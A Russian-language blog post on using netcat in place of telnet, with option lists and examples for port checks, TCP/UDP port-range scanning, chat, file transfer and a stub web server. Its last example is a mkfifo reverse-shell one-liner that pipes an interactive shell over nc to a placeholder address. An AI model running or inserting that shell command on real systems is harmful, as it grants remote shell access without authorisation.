Перейти к основному содержанию

Linux — nc вместо telnet

Linux 2

Может так случиться, что на сервере Linux может не оказаться нашей любимой команды telnet. Как тогда проверить доступность порта на удалённой машине? На помощь приходит команда nc.

Команда nc (netcat) служит для передачи и получения данных посредством протоколов TCP и UDP. Богатым функционалом она не отличается, но основные необходимые операции выполнить можно.

Проверка доступности TCP порта:

nc -vz 10.10.12.13 8080

nc

Список параметров, в зависимости от версии netcat, может отличаться:

nc --help

nc

nc

Некоторые параметры:

  • -6 – использовать протокол IPv6. По умолчанию используется параметр -4 и IPv4 соответственно
  • -h – справка
  • -i задержка в секундах
  • -l – режим прослушивания
  • -N – закрыть соединение при достижении конца файла при его отправке
  • -n – Работать с IP-адресами напрямую, не используя DNS, отключить поиск портов
  • -P имя_пользователя – указать имя пользователя для подключения к прокси
  • -x адрес:порт – указать адрес и порт для подключения к прокси
  • -p порт – номер порта
  • -U – использовать сокет домена UNIX (для межпроцессного взаимодействия)
  • -u – использовать протокол UDP, по умолчанию используется TСP
  • -v – подробный режим
  • -W количество_пакетов – закрыть соединение после получения определённого количества пакетов
  • -w таймер – таймер в секундах
  • -z – отключить отправку данных

Ещё примеры (трюки nc)

Проверка доступности TCP порта:

nc -vz 10.10.12.13 8080

Проверка доступности диапазона TCP портов:

nc -vz 10.10.12.13 1-1000 2>&1 | grep succeeded

Сканирование UDP портов:

nc -vzu 10.10.12.13 1-1000

Прослушать UDP порт на получателе:

nc -nlv 8080

Использование nc в качестве чата на открытом порту:

# на компьютере 1
nc -lp 8080

# на компьютере 2
nc 0.0.0.0 8080

Обмен файлами:

# на компьютере 1
nc -l 8080 > paste.txt

# на компьютере 2
nc -N 0.0.0.0 8080 < copy.txt

Страница веб-сервера, можно использовать в качестве заглушки:

while true; do echo -e "HTTP/1.1 200 OK\n\n$(cat index.html)" | nc -l -w 1 -p 80; done

Использование nc в качестве терминала:

# на компьютере 1
nc -lvnp 8080

# на компьютере 2
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 0.0.0.0 8080 >/tmp/f

Теги

 

Похожие материалы

Putty — SOCKS5 прокси через SSH-туннель

Однажды один из IP адресов на работе попал в SORBS SPAM. IP адрес можно выкинуть из спам листа, если зайти на сайт sorbs.net именно с этого IP адреса. Но у меня на компе другой внешний IP адрес, а на почтовике с нужным IP стоит linux и нет возможности запустить браузер. Сделаем с помощью putty SSH туннель. 

Теги

Postfix с SMTP аутентификацией Cyrus

Понадобилось сделать Postfix с SMTP аутентификацией. Раньше не настраивал, перерыл кучу статей. Очень сумбурно всё изложено, поэтому пришлось написать свой вариант. Если кто-то знает хорошую инструкцию по данному вопросу без лишней воды — пишите в комментариях.

Теги